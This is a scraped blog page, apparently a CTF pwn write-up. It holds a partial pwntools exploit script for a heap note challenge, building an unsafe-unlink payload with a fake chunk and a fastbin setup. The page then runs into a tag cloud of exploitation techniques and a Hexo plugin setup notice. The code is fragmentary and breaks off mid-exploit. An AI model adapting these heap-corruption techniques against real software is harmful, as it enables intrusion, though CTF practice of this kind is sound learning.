DEBUG = 0 VERBOSE = 1 if DEBUG: gdb.attach(p) if VERBOSE: context(log_level = "debug")
defnew_note(length,content): p.recvuntil('option--->>') p.sendline('1') p.recvuntil('Input the length of the note content:(less than 128)') p.sendline(str(length)) p.recvuntil('Input the note content:') p.sendline(content)
defshow_note(idx): p.recvuntil('option--->>') p.sendline('2') p.recvuntil('Input the id of the note:') p.sendline(str(idx))
defedit_note(idx,choice,content): p.recvuntil('option--->>') p.sendline('3') p.recvuntil('Input the id of the note:') p.sendline(str(idx)) p.recvuntil('do you want to overwrite or append?[1.overwrite/2.append]') p.sendline(str(choice)) p.recvuntil('TheNewContents:') p.sendline(content)
defdelete_note(idx): p.recvuntil('option--->>') p.sendline('4') p.recvuntil('Input the id of the note:') p.sendline(str(idx))
defexp(): p.recvuntil('Input your name:') p.sendline('1') p.recvuntil('Input your address:') p.sendline('1') payload = 'a'*8+p64(0x61)+p64(ptr-0x18)+p64(ptr-0x10) payload = payload.ljust(0x60,'b') payload += p64(0x60) new_note(0x80,payload) #use for unlink new_note(0,'d'*16) #fastbin new_note(0x80,'a'*8)
unlinkfastbin attackHouse of spiritHouse of ForceUAFDynELFPIEformat stringoff by onex6464bit格式化字符串漏洞栈溢出Canarytcachelibc-2.29chunk overlappingchunk extendshellcode,系统调用libc2.29stack overflowfmtrop2016,CTFs,fsbCTFstack pivotingOSpwnablefsb
缺失模块。
1、请确保node版本大于6.2
2、在博客根目录(注意不是archer根目录)执行以下命令: npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置: